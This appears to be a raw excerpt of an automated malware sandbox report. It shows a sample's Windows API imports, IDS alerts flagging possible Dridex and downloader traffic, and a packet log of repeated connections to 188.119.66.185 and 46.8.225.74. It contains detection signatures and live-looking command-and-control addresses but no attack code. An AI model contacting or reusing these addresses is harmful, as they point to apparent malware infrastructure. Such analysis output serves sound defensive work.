                                                                                          kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                          user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                          comctl32.dllInitCommonControls
                                                                                          advapi32.dllAdjustTokenPrivileges
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          DutchNetherlands
                                                                                          EnglishUnited States
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-12-18T13:44:58.587503+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449737188.119.66.185443TCP
                                                                                          2024-12-18T13:44:59.321192+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449737188.119.66.185443TCP
                                                                                          2024-12-18T13:45:04.162347+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449755188.119.66.185443TCP
                                                                                          2024-12-18T13:45:04.886282+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449755188.119.66.185443TCP
                                                                                          2024-12-18T13:45:06.653285+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449761188.119.66.185443TCP
                                                                                          2024-12-18T13:45:07.341047+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449761188.119.66.185443TCP
                                                                                          2024-12-18T13:45:09.025805+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449768188.119.66.185443TCP
                                                                                          2024-12-18T13:45:09.711078+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449768188.119.66.185443TCP
                                                                                          2024-12-18T13:45:11.275909+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449774188.119.66.185443TCP
                                                                                          2024-12-18T13:45:11.970395+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449774188.119.66.185443TCP
                                                                                          2024-12-18T13:45:13.603425+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449780188.119.66.185443TCP
                                                                                          2024-12-18T13:45:14.300144+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449780188.119.66.185443TCP
                                                                                          2024-12-18T13:45:15.872940+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449786188.119.66.185443TCP
                                                                                          2024-12-18T13:45:16.712134+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449786188.119.66.185443TCP
                                                                                          2024-12-18T13:45:18.301991+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449792188.119.66.185443TCP
                                                                                          2024-12-18T13:45:18.984985+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449792188.119.66.185443TCP
                                                                                          2024-12-18T13:45:20.934363+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449797188.119.66.185443TCP
                                                                                          2024-12-18T13:45:21.691519+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449797188.119.66.185443TCP
                                                                                          2024-12-18T13:45:23.260152+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449807188.119.66.185443TCP
                                                                                          2024-12-18T13:45:23.944971+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449807188.119.66.185443TCP
                                                                                          2024-12-18T13:45:25.702931+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449814188.119.66.185443TCP
                                                                                          2024-12-18T13:45:26.388621+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449814188.119.66.185443TCP
                                                                                          2024-12-18T13:45:28.010091+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449819188.119.66.185443TCP
                                                                                          2024-12-18T13:45:28.718839+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449819188.119.66.185443TCP
                                                                                          2024-12-18T13:45:30.289917+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449825188.119.66.185443TCP
                                                                                          2024-12-18T13:45:30.977003+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449825188.119.66.185443TCP
                                                                                          2024-12-18T13:45:32.568917+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449831188.119.66.185443TCP
                                                                                          2024-12-18T13:45:33.376875+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449831188.119.66.185443TCP
                                                                                          2024-12-18T13:45:35.172199+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449837188.119.66.185443TCP
                                                                                          2024-12-18T13:45:35.882009+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449837188.119.66.185443TCP
                                                                                          2024-12-18T13:45:37.453939+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449843188.119.66.185443TCP
                                                                                          2024-12-18T13:45:38.164576+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449843188.119.66.185443TCP
                                                                                          2024-12-18T13:45:39.918052+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449849188.119.66.185443TCP
                                                                                          2024-12-18T13:45:40.598925+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449849188.119.66.185443TCP
                                                                                          2024-12-18T13:45:42.175675+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449855188.119.66.185443TCP
                                                                                          2024-12-18T13:45:43.032789+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449855188.119.66.185443TCP
                                                                                          2024-12-18T13:45:44.633871+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449861188.119.66.185443TCP
                                                                                          2024-12-18T13:45:45.355222+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449861188.119.66.185443TCP
                                                                                          2024-12-18T13:45:47.273710+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449867188.119.66.185443TCP
                                                                                          2024-12-18T13:45:48.150899+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449867188.119.66.185443TCP
                                                                                          2024-12-18T13:45:49.799807+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449878188.119.66.185443TCP
                                                                                          2024-12-18T13:45:50.527844+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449878188.119.66.185443TCP
                                                                                          2024-12-18T13:45:52.148792+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449883188.119.66.185443TCP
                                                                                          2024-12-18T13:45:52.835125+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449883188.119.66.185443TCP
                                                                                          2024-12-18T13:45:54.395265+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449889188.119.66.185443TCP
                                                                                          2024-12-18T13:45:55.077137+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449889188.119.66.185443TCP
                                                                                          2024-12-18T13:45:56.835103+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449894188.119.66.185443TCP
                                                                                          2024-12-18T13:45:57.544183+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449894188.119.66.185443TCP
                                                                                          2024-12-18T13:45:59.123987+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449900188.119.66.185443TCP
                                                                                          2024-12-18T13:45:59.807945+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449900188.119.66.185443TCP
                                                                                          2024-12-18T13:46:01.600396+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449905188.119.66.185443TCP
                                                                                          2024-12-18T13:46:02.411736+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449905188.119.66.185443TCP
                                                                                          2024-12-18T13:46:04.210833+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449911188.119.66.185443TCP
                                                                                          2024-12-18T13:46:04.897599+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449911188.119.66.185443TCP
                                                                                          2024-12-18T13:46:06.464108+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449918188.119.66.185443TCP
                                                                                          2024-12-18T13:46:07.434640+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449918188.119.66.185443TCP
                                                                                          2024-12-18T13:46:09.283893+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449924188.119.66.185443TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 18, 2024 13:44:57.102277994 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:57.102325916 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:57.102430105 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:57.118235111 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:57.118252039 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:58.587399960 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:58.587502956 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:58.643404961 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:58.643423080 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:58.643801928 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:58.643909931 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:58.647500038 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:58.691334963 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:59.321211100 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:59.321288109 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:59.321340084 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:59.321340084 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:59.323084116 CET49737443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:44:59.323096991 CET44349737188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:44:59.324214935 CET497432024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:44:59.444268942 CET20244974346.8.225.74192.168.2.4
                                                                                          Dec 18, 2024 13:44:59.447596073 CET497432024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:44:59.447662115 CET497432024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:44:59.567269087 CET20244974346.8.225.74192.168.2.4
                                                                                          Dec 18, 2024 13:44:59.567341089 CET497432024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:44:59.686904907 CET20244974346.8.225.74192.168.2.4
                                                                                          Dec 18, 2024 13:45:00.700681925 CET20244974346.8.225.74192.168.2.4
                                                                                          Dec 18, 2024 13:45:00.755702019 CET497432024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:45:02.710823059 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:02.710875034 CET44349755188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:02.710999012 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:02.711287022 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:02.711304903 CET44349755188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:04.162280083 CET44349755188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:04.162347078 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:04.162802935 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:04.162817001 CET44349755188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:04.162981033 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:04.162992954 CET44349755188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:04.886327982 CET44349755188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:04.886403084 CET44349755188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:04.886468887 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:04.886470079 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:04.886811018 CET49755443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:04.886826992 CET44349755188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:05.008225918 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:05.008277893 CET44349761188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:05.008407116 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:05.008824110 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:05.008846998 CET44349761188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:06.653121948 CET44349761188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:06.653285027 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:06.653889894 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:06.653898001 CET44349761188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:06.654012918 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:06.654020071 CET44349761188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:07.341058969 CET44349761188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:07.341129065 CET44349761188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:07.341161966 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:07.341180086 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:07.341423035 CET49761443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:07.341442108 CET44349761188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:07.343041897 CET497672024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:45:07.462650061 CET20244976746.8.225.74192.168.2.4
                                                                                          Dec 18, 2024 13:45:07.462738037 CET497672024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:45:07.462810040 CET497672024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:45:07.462918997 CET497672024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:45:07.570100069 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:07.570136070 CET44349768188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:07.570219994 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:07.570549011 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:07.570564032 CET44349768188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:07.582505941 CET20244976746.8.225.74192.168.2.4
                                                                                          Dec 18, 2024 13:45:07.624403000 CET20244976746.8.225.74192.168.2.4
                                                                                          Dec 18, 2024 13:45:08.435575008 CET20244976746.8.225.74192.168.2.4
                                                                                          Dec 18, 2024 13:45:08.435698986 CET497672024192.168.2.446.8.225.74
                                                                                          Dec 18, 2024 13:45:09.025648117 CET44349768188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:09.025804996 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.026287079 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.026294947 CET44349768188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:09.026498079 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.026503086 CET44349768188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:09.711090088 CET44349768188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:09.711155891 CET44349768188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:09.711211920 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.711236000 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.711417913 CET49768443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.711431026 CET44349768188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:09.820293903 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.820341110 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:09.820440054 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.820810080 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:09.820823908 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.275789022 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.275908947 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.287760019 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.287775040 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.287931919 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.287938118 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.970408916 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.970488071 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.970504045 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.970555067 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.970761061 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.970783949 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:12.085696936 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:12.085757017 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:12.085828066 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:12.086061954 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:12.086076975 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:13.603264093 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:13.603425026 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:13.603914976 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:13.603928089 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:13.604132891 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:13.604139090 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.300154924 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.300226927 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.300240040 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.300280094 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.300472975 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.300528049 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.300597906 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.414021969 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.414068937 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.414211035 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.414464951 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.414486885 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:15.872772932 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:15.872940063 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:15.875063896 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:15.875072002 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:15.876138926 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:15.876300097 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:15.876722097 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:15.923326015 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.712157011 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.712245941 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.712272882 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.712363958 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.712512016 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.712528944 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.822554111 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.822593927 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.822700977 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.823117971 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.823137999 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.301151037 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.301990986 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.301990986 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.301990986 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.302010059 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.302026033 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.985004902 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.985078096 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.985104084 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.985122919 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.985392094 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.985426903 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:19.101720095 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:19.101768970 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:19.101843119 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:19.102178097 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:19.102193117 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:20.934287071 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:20.934362888 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:20.934915066 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:20.934926033 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:20.935201883 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:20.935210943 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.691534042 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.691613913 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.691633940 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.691664934 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.691813946 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.691836119 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.804702044 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.804739952 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.804831028 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.805080891 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.805098057 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.260077000 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.260152102 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.260694981 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.260711908 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.261008024 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.261015892 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.945014954 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.945084095 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.945096970 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.945142984 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.946147919 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.946168900 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:24.054466009 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:24.054522991 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:24.054630995 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:24.054871082 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:24.054886103 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:25.702842951 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:25.702930927 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:25.703381062 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:25.703392029 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:25.703584909 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:25.703589916 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.388659000 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.388729095 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.388744116 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.388799906 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.388955116 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.388974905 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.507657051 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.507700920 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.507860899 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.508315086 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.508328915 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.009932995 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.010091066 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.010505915 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.010512114 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.010744095 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.010746956 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.718947887 CET44349819188.119.66.185192.168.2.4
